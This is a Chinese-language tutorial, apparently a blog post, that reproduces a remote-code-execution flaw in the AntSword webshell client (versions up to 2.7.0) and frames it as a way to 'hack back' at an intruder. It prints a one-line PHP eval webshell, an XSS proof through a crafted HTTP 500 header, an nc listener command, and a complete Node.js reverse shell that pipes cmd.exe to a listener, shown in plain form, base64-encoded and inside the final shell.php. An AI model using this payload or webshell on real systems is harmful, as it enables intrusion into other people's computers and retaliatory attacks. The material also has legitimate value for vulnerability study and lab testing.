中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客

本文介绍: 中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。黑客在你的web 服务上植入了We bSh ell，利用蚁剑去连接并控制了你的电脑，这时被你发现了电脑被控制变的卡卡的，并且发现了是通过 web 服务里的WebSh ell来控制你的，想到自己磁盘里几十G的秘密学习资料可能全部被窃取，你很不爽，你想找到这个黑客小子，绞尽脑汁想了很多办法也无法痛快的还击，直到你想起来在2023年3月16号读到的我这篇文章，你抱着试试看的态度去尝试了一下，发现

中国蚁剑(AntSwo r d) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

WebShell

WebShell可以理解为网页中的木马程序，通过植入到你的web站点，在web页面上的操作，控制你的计算机操作系统，文件，权限，任意命令执行。

常见的WebShell分为大马、小马、一句话木马、内存马等。

下面为一句话木马的代码展示：

# 一句话木马
&lt;?php @eval($_POST['pass']); ?&gt;

中国蚁剑(AntSwo r d)

当你的计算机被植入了一句话木马后，需要通过工具进行连接，才可以方便管理，而AntSwo r d就是连接一句话木马工具中的其中之一，类似的工具还有：中国菜刀、哥斯拉、冰蝎等。

中国蚁剑(AntSwo r d) RCE漏洞

此漏洞在AntSwo r d2.7.1版本上修复，所以适用于AntSwo r d2.7.1以下版本。

此漏洞为AntSwo rd连接WebShell失败时对html 代码的解析，导致xss 漏洞，而使html 代码不在浏览器解析而是在服务器上解析的话需要用到 nodejs，所以AntSwo rd使用了nodejs，本文章就讲解利用xss 漏洞执行并调用 nodejs的库反弹 shell拿到权限。

吊打 黑客的场景

黑客在你的web服务上植入了WebShell，利用蚁剑去连接并控制了你的电脑，这时被你发现了电脑被控制变的卡卡的，并且发现了是通过web服务里的WebShell来控制你的，想到自己磁盘里几十G的秘密学习资料可能全部被窃取，你很不爽，你想找到这个黑客小子，绞尽脑汁想了很多办法也无法痛快的还击，直到你想起来以前读到过的我这篇文章，你抱着试试看的态度去尝试了一下，发现成功反向黑掉了那个黑客的电脑，于是你对这个黑客一系列的还击计划开始在脑海里活蹦乱跳…

模拟 环境 准备：

黑客ip： 192.168.31.124
系统: win7

被攻击的ip：192.168.31.222
系统：win10

黑客电脑 软件：

中国蚁剑AntSword2.7.0

中国蚁剑加载器AntSword-Loader2.0.1

被攻击 电脑 软件

小皮面板 Phpstudy

瑞士军刀Netcat

被攻击 电脑web部署

安装好phpstudy并运行 apache

打开80端口的网站目录并放入一句话木马WebShell文件

黑客电脑 连接WebShell

此时我们作为被攻击的电脑，可以 尝试 修改WebShell的代码

将一句话木马代码改为如下：

<?php header("HTTP/1.1 500 <img src=1 onerror=alert(1) /&gt;") ?&gt;

黑客电脑重新连接一句话木马查看效果

发现执行了我们修改的代码中的alert(1) 弹出了提示框，证明是存在 xss 漏洞的

利用nodejs库编写 p a y load，反弹黑客电脑的shell

使用<=AntSwo rd2.7.0 RCE漏洞，让黑客电脑反弹 shell到被攻击电脑的1971端口上

首先开启被攻击电脑的Netc at 监听端口1971

nc -Lp 1971

更改 shell.php代码

利用nodejs库反弹shell的代码(pay load)：

var net = require("net");
var cmd = require("child_process").exec("cmd.exe");
var socket = new net.Socket();
socket.connect(1971, "192.168.31.222", function(){
    socket.pipe(cmd.stdin);
    cmd.stdout.pipe(socket);
    cmd.stderr.pipe(socket);
});

以上代码通过创建Soc ket来连接192.168.31.222(被攻击的电脑ip) 的1971端口(Netcat监听的端口)

将以上代码进行base64加密，加密后的密文：

dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7

通过javascript的eval 函数来调用：

eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7`,`base64`).toString())

并替换掉我们前边写的alert(1)代码,最终写到shell.php中的代码如下：

<?php header("HTTP/1.1 500 <img src=1 onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7`,`base64`).toString())' />") ?>